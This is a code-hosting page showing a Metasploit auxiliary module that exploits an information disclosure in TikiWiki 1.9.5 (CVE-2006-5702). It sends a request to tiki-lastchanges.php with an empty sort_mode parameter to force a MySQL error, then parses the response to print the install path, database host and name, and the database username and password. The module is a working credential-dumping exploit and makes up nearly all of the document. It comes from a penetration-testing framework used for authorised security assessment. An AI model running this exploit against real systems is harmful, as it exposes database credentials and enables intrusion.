Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/tikiwiki/tikidblib.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'TikiWiki Information Disclosure',
14
'Description' => %q{
15
A vulnerability has been reported in Tikiwiki, which can be exploited by
16
an anonymous user to dump the MySQL user & passwd just by creating a mysql
17
error with the "sort_mode" var.
18
19
The vulnerability was reported in Tikiwiki version 1.9.5.
20
},
21
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
22
'License' => MSF_LICENSE,
23
'References' => [
24
['OSVDB', '30172'],
25
['BID', '20858'],
26
['CVE', '2006-5702'],
27
['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
28
],
29
'DisclosureDate' => '2006-11-01',
30
'Actions' => [
31
['Dump', { 'Description' => 'Dump user and password' }]
32
],
33
'DefaultAction' => 'Dump',
34
'Notes' => {
35
'Stability' => [CRASH_SAFE],
36
'SideEffects' => [],
37
'Reliability' => []
38
}
39
)
40
)
41
42
register_options(
43
[
44
OptString.new('URI', [true, 'TikiWiki directory path', '/tikiwiki']),
45
]
46
)
47
end
48
49
def run
50
print_status('Establishing a connection to the target...')
51
52
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
53
rpath = uri + '?days=1&offset=0&sort_mode='
54
55
res = send_request_raw({
56
'uri' => rpath,
57
'method' => 'GET',
58
'headers' =>
59
{
60
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
61
'Connection' => 'Close'
62
}
63
}, 25)
64
65
if res && (res.message == 'OK')
66
print_status('Get information about database...')
67
68
n = 0
69
c = 0
70
71
# puts "body is #{res.body.length} bytes"
72
infos = res.body.split(/\r?\n/)
73
infos.each do |row|
74
# puts row.inspect
75
next unless (c < 6)
76
77
if row.match(/\["file"\]=>/)
78
c += 1
79
x = n + 1
80
y = infos[x].match(/string\(\d+\) "(.*)"/m)
81
print_status("Install path : #{y[1]}")
82
end
83
if row.match(/\["databaseType"\]=>/)
84
c += 1
85
x = n + 1
86
y = infos[x].match(/string\(\d+\) "(.*)"/m)
87
print_status("DB type : #{y[1]}")
88
end
89
if row.match(/\["database"\]=>/)
90
c += 1
91
x = n + 1
92
y = infos[x].match(/string\(\d+\) "(.*)"/m)
93
print_status("DB name : #{y[1]}")
94
end
95
if row.match(/\["host"\]=>/)
96
c += 1
97
x = n + 1
98
y = infos[x].match(/string\(\d+\) "(.*)"/m)
99
print_status("DB host : #{y[1]}")
100
end
101
if row.match(/\["user"\]=>/)
102
c += 1
103
x = n + 1
104
y = infos[x].match(/string\(\d+\) "(.*)"/m)
105
print_status("DB user : #{y[1]}")
106
end
107
if row.match(/\["password"\]=>/)
108
c += 1
109
x = n + 1
110
y = infos[x].match(/string\(\d+\) "(.*)"/m)
111
print_status("DB password : #{y[1]}")
112
end
113
n += 1
114
end
115
116
if (c == 0)
117
print_status('Could not obtain information about database.')
118
end
119
120
else
121
print_status('No response from the server.')
122
end
123
end
124
end
125
126